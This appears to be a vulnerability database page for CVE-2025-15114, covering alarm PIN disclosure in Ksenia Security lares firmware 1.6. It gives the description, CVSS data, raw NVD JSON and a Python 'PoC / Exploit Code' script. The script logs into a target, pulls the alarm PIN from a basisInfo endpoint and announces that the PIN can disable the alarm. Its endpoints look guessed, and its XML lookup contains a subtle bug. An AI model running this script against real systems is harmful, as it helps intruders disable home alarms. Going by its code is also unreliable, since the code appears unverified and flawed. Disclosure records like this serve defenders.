Security Vulnerability Report
中文
CVE-2025-15114 CVSS 9.8 CRITICAL

CVE-2025-15114

Published: 2025-12-30 23:15:50
Last Modified: 2026-03-11 20:16:14
Source: [email protected]

Description

Ksenia Security lares (legacy model) Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE
Ksenia Security lares (legacy model) Home Automation version < 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15114 PoC - Ksenia Security lares PIN Code Disclosure This PoC demonstrates how to retrieve the alarm system PIN from basisInfo XML """ import requests import xml.etree.ElementTree as ET import sys def exploit_cve_2025_15114(target_url, username, password): """ Exploit function to retrieve PIN from basisInfo XML Args: target_url: Base URL of the Ksenia lares system username: Valid username for authentication password: Valid password for authentication Returns: PIN code if successful, None otherwise """ session = requests.Session() # Step 1: Authenticate to the system login_url = f"{target_url}/api/login" login_data = { "username": username, "password": password } try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed with status code: {response.status_code}") return None print("[+] Authentication successful") # Step 2: Request basisInfo XML endpoint basisinfo_url = f"{target_url}/api/basisInfo" response = session.get(basisinfo_url, timeout=10) if response.status_code != 200: print(f"[-] Failed to retrieve basisInfo: {response.status_code}") return None # Step 3: Parse XML response to extract PIN try: root = ET.fromstring(response.text) # Search for PIN element in XML tree pin_element = root.find('.//pin') or root.find('.//Pin') or root.find('.//PIN') if pin_element is not None: pin_code = pin_element.text print(f"[!] VULNERABLE! PIN Code found: {pin_code}") print(f"[+] Attackers can now disable the alarm system using this PIN") return pin_code else: print("[-] PIN element not found in response") print(f"[-] Response content:\n{response.text}") return None except ET.ParseError as e: print(f"[-] Failed to parse XML response: {e}") return None except requests.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python cve_2025_15114_poc.py <target_url> <username> <password>") print("Example: python cve_2025_15114_poc.py https://192.168.1.100 admin admin123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] print(f"[*] CVE-2025-15114 PoC - Ksenia Security lares PIN Disclosure") print(f"[*] Target: {target}") print(f"[*] Attempting to retrieve alarm PIN...") pin = exploit_cve_2025_15114(target, user, passwd) if pin: print(f"\n[+] SUCCESS: Alarm system PIN '{pin}' has been extracted") print("[!] This PIN can be used to disable the alarm system") else: print("\n[-] FAILED: Could not retrieve PIN code")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15114", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:50.070", "lastModified": "2026-03-11T20:16:13.593", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) Home Automation version 1.6 contains a critical security flaw that exposes the alarm system PIN in the 'basisInfo' XML file after authentication. Attackers can retrieve the PIN from the server response to bypass security measures and disable the alarm system without additional authentication."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 Home Automation versión 1.6 contiene una falla de seguridad crítica que expone el PIN del sistema de alarma en el archivo XML 'basisInfo' después de la autenticación. Los atacantes pueden recuperar el PIN de la respuesta del servidor para eludir las medidas de seguridad y deshabilitar el sistema de alarma sin autenticación adicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-403"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-668"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-pin-exposure-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5929.php", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5929.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.